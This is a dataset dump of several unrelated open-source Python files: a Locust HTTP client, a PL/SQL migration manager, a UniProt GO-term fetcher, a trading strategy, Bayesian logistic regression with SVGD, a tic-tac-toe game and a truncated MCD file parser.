response \n code is ok (2xx). The opposite also works, one can use catch_response to catch a request \n and then mark it as successful even if the response code was not (i.e 500 or 404).\n :param data: (optional) Dictionary or bytes to send in the body of the request.\n :param headers: (optional) Dictionary of HTTP Headers to send with the request.\n :param auth: (optional) Auth (username, password) tuple to enable Basic HTTP Auth.\n :param stream: (optional) If set to true the response body will not be consumed immediately \n and can instead be consumed by accessing the stream attribute on the Response object.\n Another side effect of setting stream to True is that the time for downloading the response \n content will not be accounted for in the request time that is reported by Locust.\n \"\"\"\n # prepend url with hostname unless it's already an absolute URL\n url = self._build_url(path)\n \n # store meta data that is used when reporting the request to locust's statistics\n request_meta = {}\n # set up pre_request hook for attaching meta data to the request object\n request_meta[\"method\"] = method\n request_meta[\"start_time\"] = default_timer()\n request_meta[\"name\"] = name or path\n \n if auth:\n headers = headers or {}\n headers['Authorization'] = _construct_basic_auth_str(auth[0], auth[1])\n elif self.auth_header:\n headers = headers or {}\n headers['Authorization'] = self.auth_header\n \n # send request, and catch any exceptions\n response = self._send_request_safe_mode(method, url, payload=data, headers=headers, **kwargs)\n \n # get the length of the content, but if the argument stream is set to True, we take\n # the size from the content-length header, in order to not trigger fetching of the body\n if stream:\n request_meta[\"content_size\"] = int(response.headers.get(\"content-length\") or 0)\n else:\n request_meta[\"content_size\"] = len(response.content or \"\")\n \n # Record the consumed time\n # Note: This is intentionally placed after we record the content_size above, since \n # we'll then trigger fetching of the body (unless stream=True)\n request_meta[\"response_time\"] = int((default_timer() - request_meta[\"start_time\"]) * 1000)\n \n if catch_response:\n response.locust_request_meta = request_meta\n return ResponseContextManager(response)\n else:\n try:\n response.raise_for_status()\n except FAILURE_EXCEPTIONS as e:\n events.request_failure.fire(\n request_type=request_meta[\"method\"], \n name=request_meta[\"name\"], \n response_time=request_meta[\"response_time\"], \n exception=e, \n )\n else:\n events.request_success.fire(\n request_type=request_meta[\"method\"],\n name=request_meta[\"name\"],\n response_time=request_meta[\"response_time\"],\n response_length=request_meta[\"content_size\"],\n )\n return response\n \n def delete(self, path, **kwargs):\n return self.request(\"DELETE\", path, **kwargs)\n \n def get(self, path, **kwargs):\n \"\"\"Sends a GET request\"\"\"\n return self.request(\"GET\", path, **kwargs)\n \n def head(self, path, **kwargs):\n \"\"\"Sends a HEAD request\"\"\"\n return self.request(\"HEAD\", path, **kwargs)\n \n def options(self, path, **kwargs):\n \"\"\"Sends a OPTIONS request\"\"\"\n return self.request(\"OPTIONS\", path, **kwargs)\n \n def patch(self, path, data=None, **kwargs):\n \"\"\"Sends a POST request\"\"\"\n return self.request(\"PATCH\", path, data=data, **kwargs)\n \n def post(self, path, data=None, **kwargs):\n \"\"\"Sends a POST request\"\"\"\n return self.request(\"POST\", path, data=data, **kwargs)\n \n def put(self, path, data=None, **kwargs):\n \"\"\"Sends a PUT request\"\"\"\n return self.request(\"PUT\", path, data=data, **kwargs)\n\n\nclass FastResponse(CompatResponse):\n headers = None\n \"\"\"Dict like object containing the response headers\"\"\"\n \n _response = None\n \n @property\n def text(self):\n \"\"\"\n Returns the text content of the response as a decoded string\n (unicode on python2)\n \"\"\"\n # Decode unicode from detected encoding.\n try:\n content = unicode(self.content, self.apparent_encoding, errors='replace')\n except (LookupError, TypeError):\n # A LookupError is raised if the encoding was not found which could\n # indicate a misspelling or similar mistake.\n #\n # A TypeError can be raised if encoding is None\n #\n # Fallback to decode without specifying encoding\n content = unicode(self.content, errors='replace')\n return content\n \n @property\n def apparent_encoding(self):\n \"\"\"The apparent encoding, provided by the chardet library.\"\"\"\n return chardet.detect(self.content)['encoding']\n \n def raise_for_status(self):\n \"\"\"Raise any connection errors that occured during the request\"\"\"\n if hasattr(self, 'error') and self.error:\n raise self.error\n \n @property\n def status_code(self):\n \"\"\"\n We override status_code in order to return None if no valid response was \n returned. E.g. in the case of connection errors\n \"\"\"\n return self._response is not None and self._response.get_code() or 0\n \n def _content(self):\n if self.headers is None:\n return None\n return super(FastResponse, self)._content()\n\n\nclass ErrorResponse(object):\n \"\"\"\n This is used as a dummy response object when geventhttpclient raises an error \n that doesn't have a real Response object attached. E.g. a socket error or similar\n \"\"\"\n headers = None\n content = None\n status_code = 0\n error = None\n text = None\n def raise_for_status(self):\n raise self.error\n\n\nclass LocustUserAgent(UserAgent):\n response_type = FastResponse\n \n def _urlopen(self, request):\n \"\"\"Override _urlopen() in order to make it use the response_type attribute\"\"\"\n client = self.clientpool.get_client(request.url_split)\n resp = client.request(request.method, request.url_split.request_uri,\n body=request.payload, headers=request.headers)\n return self.response_type(resp, request=request, sent_request=resp._sent_request)\n\n\nclass ResponseContextManager(FastResponse):\n \"\"\"\n A Response class that also acts as a context manager that provides the ability to manually \n control if an HTTP request should be marked as successful or a failure in Locust's statistics\n \n This class is a subclass of :py:class:`FastResponse ` \n with two additional methods: :py:meth:`success `\n and :py:meth:`failure `.\n \"\"\"\n \n _is_reported = False\n \n def __init__(self, response):\n # copy data from response to this object\n self.__dict__ = response.__dict__\n self._cached_content = response.content\n \n def __enter__(self):\n return self\n \n def __exit__(self, exc, value, traceback):\n if self._is_reported:\n # if the user has already manually marked this response as failure or success\n # we can ignore the default haviour of letting the response code determine the outcome\n return exc is None\n \n if exc:\n if isinstance(value, ResponseError):\n self.failure(value)\n else:\n return False\n else:\n try:\n self.raise_for_status()\n except FAILURE_EXCEPTIONS as e:\n self.failure(e)\n else:\n self.success()\n return True\n \n def success(self):\n \"\"\"\n Report the response as successful\n \n Example::\n \n with self.client.get(\"/does/not/exist\", catch_response=True) as response:\n if response.status_code == 404:\n response.success()\n \"\"\"\n events.request_success.fire(\n request_type=self.locust_request_meta[\"method\"],\n name=self.locust_request_meta[\"name\"],\n response_time=self.locust_request_meta[\"response_time\"],\n response_length=self.locust_request_meta[\"content_size\"],\n )\n self._is_reported = True\n \n def failure(self, exc):\n \"\"\"\n Report the response as a failure.\n \n exc can be either a python exception, or a string in which case it will\n be wrapped inside a CatchResponseError. \n \n Example::\n \n with self.client.get(\"/\", catch_response=True) as response:\n if response.content == \"\":\n response.failure(\"No data\")\n \"\"\"\n if isinstance(exc, six.string_types):\n exc = CatchResponseError(exc)\n \n events.request_failure.fire(\n request_type=self.locust_request_meta[\"method\"],\n name=self.locust_request_meta[\"name\"],\n response_time=self.locust_request_meta[\"response_time\"],\n exception=exc,\n )\n self._is_reported = True\n","repo_name":"heyman/locust","sub_path":"locust/contrib/fasthttp.py","file_name":"fasthttp.py","file_ext":"py","file_size_in_byte":15632,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"74435806508","text":"from pid_controller import PIDController\n\n\ndef main():\n pid = PIDController(1, 0.1, 0.5, -1, 1)\n pid # Just to ingore the linting warning\n print(\"This is a PID Controller Python Package\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PedroS235/pid_controller_py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12600926685","text":"import os, cx_Oracle, re, ntpath\nfrom pathlib import Path\nfrom datetime import datetime, date\nfrom pladmin.database import Database\nfrom pladmin.files import Files\n\n\nclass Migrations(Files, Database):\n\n __dsPath = None\n __asPath = None\n __executeScripts = None\n __basePlPath = None\n __branch = None\n __created = None \n __toDay = None\n\n\n def __init__(self):\n super().__init__()\n \n def createScript(self, fileType, quantity=1, basicPl=False):\n \"\"\" create file type .sql \"\"\"\n path = self.script_dir_dml\n\n if fileType == 'ddl':\n path = self.script_dir_dll\n\n fileCreating = []\n \n for _ in range(quantity):\n date = datetime.now()\n today = date.strftime(\"%m%d%Y%H%M%S\")\n\n \"\"\" counting the scripts in the directory to get next sequences \"\"\"\n quantityScriptsDir = len(os.listdir(path)) + 1\n\n fileName = \"%s%s%s.sql\" % (fileType, today, quantityScriptsDir)\n FullPahtScript = \"%s/%s\" % (path, fileName)\n\n script = open(FullPahtScript, \"w+\")\n fileCreating.append(fileName)\n\n if basicPl == 'Y':\n self.__copyContentFile(files, self.__basePlPath)\n\n return fileCreating\n\n @staticmethod\n def __copyContentFile(nameFileWrite, nameFileCopy):\n \"\"\" this function copy file content and paste in other file \"\"\"\n try:\n with open(nameFileCopy) as f:\n with open(nameFileWrite, \"w\") as f1:\n for line in f:\n f1.write(line)\n except FileNotFoundError as e:\n raise\n\n def migrate(self, typeFile=\"\"):\n path = '/plsql/scripts/%s' % typeFile.upper()\n\n for filename in Path(path).rglob('*.sql'):\n if re.search(typeFile, ntpath.basename(filename).lower()):\n yield filename\n # self.executeMigration(FullName=filename)\n\n def executeMigration(self, FullName):\n \"\"\" this function execute all instruccion sql in indicate file\n and create records with file execute \"\"\" \n \n scriptName = ntpath.basename(FullName)\n dataScript = self.getScriptByName(scriptName=scriptName)\n\n try:\n if not dataScript:\n with open(FullName, 'r') as scriptFile:\n \"\"\" read file and convert in string for run like script by cx_oracle \"\"\"\n executeStatement = scriptFile.read()\n\n if executeStatement:\n db = self.dbConnect()\n cursor = db.cursor()\n output = []\n\n # enable DBMS_OUTPUT\n cursor.callproc(\"dbms_output.enable\")\n cursor.execute(executeStatement)\n \n # perform loop to fetch the text that was added by PL/SQL\n textVar = cursor.var(str)\n statusVar = cursor.var(int)\n \n while True:\n # get output in oracle script\n cursor.callproc(\"dbms_output.get_line\", (textVar, statusVar))\n if statusVar.getvalue() != 0:\n break\n output.append(textVar.getvalue())\n \n dbmsOutPut = ' '.join(output)\n\n self.createMigration(scriptName=scriptName, status='OK',\n fullPath=FullName, typeScript=\"Prueba\", \n output=dbmsOutPut)\n \n # disabled oracle DBMS_OUTPUT\n cursor.callproc(\"dbms_output.disable\")\n return 'success %s' % scriptName\n\n else:\n return 'this file is blank'\n \n else:\n return 'Nothing to migrate'\n \n except Exception as error:\n raise\n # if script raise error stop pap ejecution\n # raise Exception('an error occurred in the execution of the script %s error: %s ' % (FullName, error))\n \n def checkPlaceScript(self):\n \"\"\" check that script DS dont have command ddl \"\"\"\n\n if len (os.listdir(self.__dsPath)) == 0:\n return 'Nothing to check'\n # These commands must be executed before production.\n reservedWords = ['ALTER','CREATE', 'REPLACE', \n 'DROP', 'TRUNCATE', 'RENAME', 'GRANT', 'REVOKE']\n\n scriptsMove = []\n message = \"all script in order\"\n\n for dirFiles in os.listdir(self.__dsPath):\n scriptRevision = os.path.join(self.__dsPath, dirFiles)\n with open(scriptRevision, 'r') as fileScript:\n statement = fileScript.read()\n\n for word in reservedWords:\n existsWord = statement.count(word)\n\n if existsWord > 0:\n scriptsMove.append(dirFiles)\n os.rename(scriptRevision, os.path.join(self.__asPath, dirFiles))\n\n if scriptsMove:\n message = ''' the scripts %s was moved to the execution of \n ace scripts, because it contained ddl instructions' % scriptsMove '''\n \n return message\n \n def listAllMigration(self):\n ds = os.listdir(self.__dsPath)\n aS = os.listdir(self.__asPath)\n\n return aS, ds\n \n def removeMigrations(self, migration):\n try:\n os.remove(migration)\n return 'migration removed'\n except FileNotFoundError as e:\n return 'migration not found'\n \n def getMigration(self, migration, typeFile):\n try:\n path = os.path.join(self.__asPath, migration.upper())\n\n if typeFile == 'ds':\n path = os.path.join(self.__dsPath, migration.upper())\n\n with open(path, 'r') as migration:\n return migration.read()\n\n except FileNotFoundError as e:\n return 'migration not found'\n","repo_name":"Trilogy-Dominicana/PL-Admin","sub_path":"pladmin/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5461876350","text":"import requests\nfrom nalaf.utils.cache import Cacheable\n\nclass GOTerms(Cacheable):\n \"\"\"\n Helper class that accesses the database identifier mapping service from Uniprot.\n and returns a list of 2-tuple with the requested geneid and the corresponding Uniprot ID.\n \"\"\"\n def __init__(self):\n super().__init__()\n self.url = 'http://www.uniprot.org/uniprot/{}.txt'\n\n\n def get_goterms_for_uniprot_id(self, list_uniprotids):\n \"\"\"\n Get dictionary mapping from { UniprotID : [ GOTerms, ... ]\n :param list_geneids:\n :type list_geneids: [int] or [str] or int or str\n :return: dictionary uniprotid --> goterms-list\n \"\"\"\n return_dict = {}\n to_be_downloaded = []\n\n for uniprotid in list_uniprotids:\n if uniprotid in self.cache:\n return_dict[uniprotid] = self.cache[uniprotid]\n else:\n to_be_downloaded.append(uniprotid)\n\n if len(to_be_downloaded) == 0:\n return return_dict\n\n for uniprotid in to_be_downloaded:\n return_dict[uniprotid] = []\n r = requests.get(self.url.format(uniprotid))\n for line in r.text.splitlines():\n if line.startswith(\"DR GO;\"):\n startIndex = line.find('GO:')\n endIndex = startIndex+10\n return_dict[uniprotid].append(line[startIndex:endIndex])\n\n return return_dict\n","repo_name":"Rostlab/relna","sub_path":"relna/utils/go_utils.py","file_name":"go_utils.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"18926270534","text":"#!/usr/bin/python\nimport sys\nimport os\nimport json\nimport datetime\nfrom os import walk\nfrom datetime import timedelta\n\nclass partner_summary:\n def __init__(self):\n self.key_list = [\"M1\", \"M2\", \"m3\", \"M5\", \"nawala\", \"unlp\", \"uccgh\", \"kaznic\", \"twnic\", \"tlsa\"]\n self.state = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n def check_file(self, file_name, key):\n \"check whether name in file matches partner and remember key\"\n i = 0\n while (i < len(self.key_list)):\n if(file_name.find(self.key_list[i]) != -1):\n self.state[i] |= key\n i += 1;\n\n def save_as_json(self, f_name, year, month):\n \"Save the summary as a CSV file\"\n json_file = open(f_name, \"w\")\n json_file.write(\"{\\n\")\n json_file.write(\"\\\"date\\\" : \\\"\" + str(year) + \"-\" + format(month, \"02d\") + \"\\\",\\n\")\n json_file.write(\"\\\"year\\\" : \" + str(year) + \",\\n\")\n json_file.write(\"\\\"month\\\" : \" + str(month) + \",\\n\")\n json_file.write(\"\\\"partners\\\" : [\\n\")\n i = 0\n while (i < len(self.key_list)):\n if(i > 0):\n json_file.write(\",\\n\")\n m0= self.state[i]&1\n m1 = (self.state[i]>>1)&1\n json_file.write(\"[\\\"\" + self.key_list[i] + \"\\\",\" + str(m0) + \",\" + str(m1) + \"]\")\n i+=1\n json_file.write(\"]\\n\")\n json_file.write(\"}\\n\")\n json_file.close()\n\n# Main\n\nmetric_dirs = [ \"M1\", \"M2\" ]\nsummary = partner_summary()\nmypath = sys.argv[1]\nithi = sys.argv[2]\ncurrent = datetime.date.today()\nprevious = datetime.date(current.year, current.month, 1) - timedelta(days=1)\nbefore = datetime.date(previous.year, previous.month, 1) - timedelta(days=1)\ncurrent_month = str(current.year) + \"-\" + format(current.month, \"02d\")\nprevious_month = str(previous.year) + \"-\" + format(previous.month, \"02d\")\nbefore_month = str(before.year) + \"-\" + format(before.month, \"02d\")\n\ntlsa1 = \"tlsa-data-\" + current_month + \".csv\"\ntlsa2 = \"tlsa-data-\" + previous_month + \".csv\"\n\nfor (dirpath, dirnames, filenames) in walk(mypath):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if (file_name.endswith(\"_this_month.txt\")):\n summary.check_file(file_name, 1)\n if (file_name.endswith(\"previous_month.txt\")):\n summary.check_file(file_name, 2)\n if (file_name == tlsa1):\n summary.check_file(file_name, 1)\n if (file_name == tlsa2):\n summary.check_file(file_name, 2)\n\ni = 0\nwhile (i < len(metric_dirs)):\n m_dir = ithi + \"/\" + metric_dirs[i]\n for (dirpath, dirnames,filenames) in walk(m_dir):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if(file_name.find(previous_month) != -1):\n summary.check_file(file_name, 1)\n if (file_name.find(before_month) != -1):\n summary.check_file(file_name, 2)\n i+=1\n\nm_dir = ithi + \"/M5\" \nfor (dirpath, dirnames,filenames) in walk(m_dir):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if(file_name.find(current_month) != -1):\n summary.check_file(file_name, 1)\n if (file_name.find(previous_month) != -1):\n summary.check_file(file_name, 2)\n\nsummary.save_as_json(sys.argv[3], current.year, current.month)\n","repo_name":"private-octopus/ithitools","sub_path":"src/partnercheck.py","file_name":"partnercheck.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21486182201","text":"import backtrader as bt\n\n\nclass BaseSignalStrategy(bt.SignalStrategy):\n params = {\"print_log\": True}\n\n def log(self, txt, dt=None, do_print=False):\n if self.params.print_log or do_print:\n dt = dt or self.datas[0].datetime.date(0)\n print(f\"{dt.isoformat()} - {txt}\")\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(f\"Buy Executed - Price: {order.executed.price:.2f} - Cost: {order.executed.value:.2f}\")\n else: # Sell\n self.log(f\"Sell Executed - Price: {order.executed.price:.2f} - Cost: {order.executed.value:.2f}\")\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log(\"Order Canceled/Margin/Rejected\")\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n self.log(f\"Operation Profit, Gross {trade.pnl:.2f} - NET {trade.pnlcomm:.2f}\")\n","repo_name":"fernandoe/cr-server","sub_path":"src/fe_backtrader/engine/strategies/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19570891537","text":"__author__ = \"AivanF\"\n\nfrom os import environ\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import declarative_base, sessionmaker, Session\nfrom sqlalchemy import Index, Column, Integer, String, JSON\nfrom sqlalchemy.future import select\n\nDATABASE_URL = environ.get(\"DATABASE_URL\", \"sqlite+aiosqlite:///./test.db\")\nengine = create_async_engine(DATABASE_URL, future=True, echo=True)\nasync_session = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\nBase = declarative_base()\n\n\nasync def delete_database():\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.drop_all)\n\n\nasync def create_database():\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.create_all)\n\n\nclass Model(Base):\n __tablename__ = \"smth\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n data = Column(JSON, nullable=False)\n\n idx_main = Index(\"name\", \"id\")\n\n\nasync def create_object(db: Session, name: str, data: dict):\n connection = Model(name=name, data=data)\n db.add(connection)\n await db.flush()\n\n\nasync def get_objects(db: Session, name: str):\n raw_q = select(Model) \\\n .where(Model.name == name) \\\n .order_by(Model.id)\n q = await db.execute(raw_q)\n return q.scalars().all()\n","repo_name":"AivanF/Postgres-SQLAlchemy-FastAPI-problem","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23740351091","text":"from __future__ import print_function, division, absolute_import\nimport numpy as np\n\n'''\n We base on the code of SVGD released by its original author (Qiang Liu and Dilin Wang). Note that we also keep some\n of their comments in the code.\n\n Bayesian Logistic Regression (the same setting as Gershman et al. 2012):\n The observed data D = {X, y} consist of N binary class labels, \n y_t \\in {-1,+1}, and d covariates for each datapoint, X_t \\in R^d.\n The hidden variables \\theta = {w, \\alpha} consist of d regression coefficients w_k \\in R,\n and a precision parameter \\alpha \\in R_+. We assume the following model:\n p(\\alpha) = Gamma(\\alpha; a, b)\n p(w_k | a) = N(w_k; 0, \\alpha^-1)\n p(y_t = 1| x_t, w) = 1 / (1+exp(-w^T x_t))\n'''\n\n\nclass BayesianLR_VR:\n def __init__(self, X, Y, batchsize=100, a0=1, b0=0.01):\n self.X, self.Y = X, Y\n self.batchsize = min(batchsize, X.shape[0])\n self.a0, self.b0 = a0, b0\n\n self.N = X.shape[0]\n self.permutation = np.random.permutation(self.N)\n self.iter = 0\n\n def grad_ln_posterior(self, theta, data_idx=None):\n '''\n M: number of particles (i.e. theta)\n n: number of data points at which we compute the posterior (i.e. the number of elements in data_idx)\n N: number of all data points in the dataset\n D: dimension of each data point\n '''\n\n if data_idx is None:\n if self.batchsize > 0:\n batch = [i % self.N for i in range(self.iter * self.batchsize, (self.iter + 1) * self.batchsize)]\n ridx = self.permutation[batch]\n self.iter += 1\n else:\n ridx = np.random.permutation(self.X.shape[0])\n else:\n ridx = np.copy(data_idx)\n\n Xs = self.X[ridx, :] # n x D\n Ys = self.Y[ridx] # n\n\n w = theta[:, :-1] # logistic weights: M x D\n alpha = np.exp(theta[:, -1]) # the last column is logalpha\n d = w.shape[1] # D\n\n wt = np.multiply((alpha / 2), np.sum(w ** 2, axis=1)) # (M,)\n dalpha = d / 2.0 - wt + (self.a0 - 1) - self.b0 * alpha + 1 # (M,); the last term is the jacobian term\n\n coff = np.matmul(Xs, w.T) # n x M\n y_hat = 1.0 / (1.0 + np.exp(-1 * coff)) # n x M\n\n dw_data = np.matmul(((np.broadcast_to(np.vstack(Ys), (len(Ys), theta.shape[0])) + 1) / 2.0 - y_hat).T,\n Xs) # Y \\in {-1,1}\n dw_prior = -np.multiply(np.broadcast_to(np.vstack(alpha), (len(alpha), d)), w) # M x D\n dw = dw_data * 1.0 * self.N / Xs.shape[0] + dw_prior # re-scale to estimate the likelihood of the full\n # dataset from the likelihood of a minibatch\n\n return np.hstack([dw, np.vstack(dalpha)]) # first order derivative: M x (D + 1)\n\n def grad_ln_likelihood(self, theta, data_idx=None):\n '''\n M: number of particles (i.e. theta)\n n: number of data points at which we compute the likelihoods (i.e. the number of elements in data_idx)\n D: dimension of each data point\n '''\n\n if data_idx is None: # compute the likelihood of every data point in the full dataset\n data_idx = np.arange(self.N)\n\n w = theta[:, :-1] # logistic weights: M x D\n alpha = np.exp(theta[:, -1]) # the last column is logalpha: (M,)\n d = w.shape[1] # D\n\n wt = np.multiply((alpha / 2), np.sum(w ** 2, axis=1)) # (M,)\n dalpha_data = (d / 2.0 - wt + 1) * len(data_idx) / self.N # (M,)\n\n Xs = self.X[data_idx, :] # n x D\n Ys = self.Y[data_idx] # n\n\n coff = np.matmul(Xs, w.T) # n x M\n y_hat = 1.0 / (1.0 + np.exp(-1 * coff)) # n x M\n\n dw_data = np.matmul(((np.broadcast_to(np.vstack(Ys), (len(Ys), theta.shape[0])) + 1) / 2.0 - y_hat).T,\n Xs) # Y \\in {-1,1}\n\n return np.hstack([dw_data, np.vstack(dalpha_data)]) # M x (D + 1)\n\n def evaluation(self, theta, X_test, y_test):\n theta = theta[:, :-1]\n M, n_test = theta.shape[0], len(y_test)\n\n prob = np.zeros([n_test, M])\n for t in range(M):\n coff = np.multiply(y_test, np.sum(\n -1 * np.multiply(np.broadcast_to(theta[t, :], (n_test, len(theta[t, :]))), X_test), axis=1))\n prob[:, t] = np.divide(np.ones(n_test), (1 + np.exp(coff)))\n\n prob = np.mean(prob, axis=1)\n acc = np.mean(prob > 0.5)\n llh = np.mean(np.log(prob))\n return [acc, llh]\n\n def predict_in_dataset(self, theta, data_idx):\n '''\n Predict the labels given observations in the input dataset.\n\n theta: weights of the Bayesian logistic regression.\n\n data_idx: indices of the observations in the given dataset.\n '''\n return self.predict(theta, self.X[data_idx, :], self.Y[data_idx])\n\n def predict(self, theta, X_test, y_test=None):\n '''\n Predict the labels given observations.\n\n theta: weights of the Bayesian logistic regression.\n\n X_test: observations. Size N x D, where N is the number of observations and D is the dimension of each observation.\n\n y_test: corresponding true labels.\n '''\n theta = theta[:, :-1]\n M, n_test = theta.shape[0], len(y_test)\n\n prob = np.zeros([n_test, M])\n for t in np.arange(M):\n coeff = -1.0 * np.matmul(X_test, theta[t, :])\n prob[:, t] = np.divide(np.ones(n_test), (1 + np.exp(coeff)))\n\n prob = np.mean(prob, axis=1)\n y_pred = np.ones(n_test)\n y_pred[prob <= 0.5] = -1\n\n if y_test is None:\n return y_pred\n return y_pred, np.sum(y_pred == y_test)\n\n def eval_est_grad_var(self, theta, batchsize=None, shuffled_idx=None, variance_reduction=False, mu=None,\n theta_ss=None):\n '''\n Evaluate the standard deviation of the estimator of the full-batch gradient.\n shuffled_idx: the list of the shuffled indices of all data points in the dataset. If this list is not\n provided, the current permutation stored in this object will be used. By default, shuffled_idx = None.\n\n variance_reduction: if True, SVRG estimator if used. If False, the traditional mini-batch estimator is used.\n By default, variance_reduction = False.\n\n mu: used in SVRG (i.e. when variance_reduction = True). This is the gradient of log likelihood of full\n dataset evaluated with the snapshot value of the parameters. By default, mu = None.\n\n theta_ss: (snapshot theta) used in SVRG. This is a snapshot of parameters. By default, theta_ss = None.\n '''\n batchsize = self.batchsize if batchsize is None else batchsize\n shuffled_idx = self.permutation if shuffled_idx is None else shuffled_idx\n all_est_grad = None\n true_grad = self.grad_ln_posterior(theta, shuffled_idx) # (num_particles, particle_dim)\n num_batches = int(np.ceil(self.N / batchsize))\n if not variance_reduction:\n for it in np.arange(num_batches):\n batch = np.arange(it * batchsize, (it + 1) * batchsize) % self.N\n ridx = shuffled_idx[batch]\n rho = self.grad_ln_posterior(theta, ridx) # (num_particles, particle_dim)\n if all_est_grad is None:\n all_est_grad = rho\n else:\n all_est_grad = np.hstack((all_est_grad, rho)) # (num_particles, particle_dim * num_batches)\n else:\n for it in np.arange(num_batches):\n batch = np.arange(it * batchsize, (it + 1) * batchsize) % self.N\n ridx = shuffled_idx[batch]\n gradlnp_hat = self.grad_ln_posterior(theta, ridx) # (num_particles, particle_dim)\n rho = gradlnp_hat - self.grad_ln_likelihood(theta_ss,\n ridx) * self.N / batchsize + mu # (num_particles, particle_dim)\n if all_est_grad is None:\n all_est_grad = rho\n else:\n all_est_grad = np.hstack((all_est_grad, rho)) # (num_particles, particle_dim * num_batches)\n tmp = np.reshape((all_est_grad - np.tile(true_grad, (1, num_batches))) ** 2, (theta.shape[0], num_batches, -1))\n # (num_particles, num_batches, particle_dim)\n tmp = np.sqrt(np.mean(tmp, axis=1)) # (num_particles, particle_dim)\n stddev_est_grad = np.mean(tmp, axis=0) # (particle_dim,)\n return stddev_est_grad\n","repo_name":"nhan-dam/svgd-variance-reduction","sub_path":"bayesian_logistic_regression.py","file_name":"bayesian_logistic_regression.py","file_ext":"py","file_size_in_byte":8582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28126581636","text":"from tkinter import*\r\ndef callback(n,m):\r\n global player\r\n \r\n if player==\"😍\" and states[n][m]==0 and stop_game==False: #We Can also use Hash Value of Emoji\r\n b[n][m].configure(text='😍',fg='blue',bg='white')\r\n states[n][m]='😍'\r\n player='💔' \r\n \r\n if player==\"💔\" and states[n][m]==0 and stop_game==False:\r\n b[n][m].configure(text='💔',fg='orange',bg='black')\r\n states[n][m]='💔'\r\n player='😍'\r\n check_for_winner()\r\n \r\ndef check_for_winner():\r\n global stop_game\r\n for i in range(3):\r\n if states[i][0]==states[i][1]==states[i][2]!=0:\r\n b[i][0].config(bg='gray')\r\n b[i][1].config(bg='gray')\r\n b[i][2].config(bg='gray')\r\n stop_game=True\r\n for i in range(3):\r\n if states[0][i]==states[1][i]==states[2][i]!=0:\r\n b[0][i].config(bg='gray')\r\n b[1][i].config(bg='gray')\r\n b[2][i].config(bg='gray')\r\n stop_game=True \r\n \r\n if states[0][0]==states[1][1]==states[2][2]!=0:\r\n b[0][1].config(bg='gray')\r\n b[1][1].config(bg='gray')\r\n b[2][2].config(bg='gray')\r\n stop_game=True \r\n if states[2][0]==states[1][1]==states[0][2]!=0:\r\n b[2][0].config(bg='gray')\r\n b[1][1].config(bg='gray')\r\n b[0][2].config(bg='gray')\r\n stop_game=True \r\nroot=Tk()\r\nroot.title(\"TIC TAC TOE \")\r\n\r\nb=[[0,0,0,],\r\n [0,0,0,],\r\n [0,0,0]]\r\nstates=[[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\nfor i in range(3):\r\n for j in range(3):\r\n b[i][j]=Button(font=(\"Arial\",60),width=4,bg='powder blue',\r\n command=lambda n=i,m=j: callback(n,m))\r\n b[i][j].grid(row=i,column=j)\r\nplayer='😍'\r\nstop_game=False\r\nroot.mainloop()\r\n ","repo_name":"Repidex/GUI-Applications","sub_path":"Tic-tac-toe/tic-tack-toe.py","file_name":"tic-tack-toe.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2199589766","text":"import copy\nimport os, sys\nimport json\nimport ioUtils\nimport zlib\n\ndef hash_event_name(name):\n return zlib.crc32(name.lower().encode(\"utf-8\")) & ~0x80000000 # HAH gotem platinum\n\n# https://github.com/synspawacza/nier_automata_localization\ndef calc_eager_padding(offset, mod): \n return mod - (offset % mod)\n\ndef write_eager_padding(offset, mod):\n return b\"\\0\" * calc_eager_padding(offset, mod)\n\nclass Header:\n struct_size = 40\n\n def from_mcd(self, file):\n self.messages_offset = ioUtils.read_int32(file)\n self.messages_count = ioUtils.read_int32(file)\n self.symbols_offset = ioUtils.read_int32(file)\n self.symbols_count = ioUtils.read_int32(file)\n self.glyphs_offset = ioUtils.read_int32(file)\n self.glyphs_count = ioUtils.read_int32(file)\n self.fonts_offset = 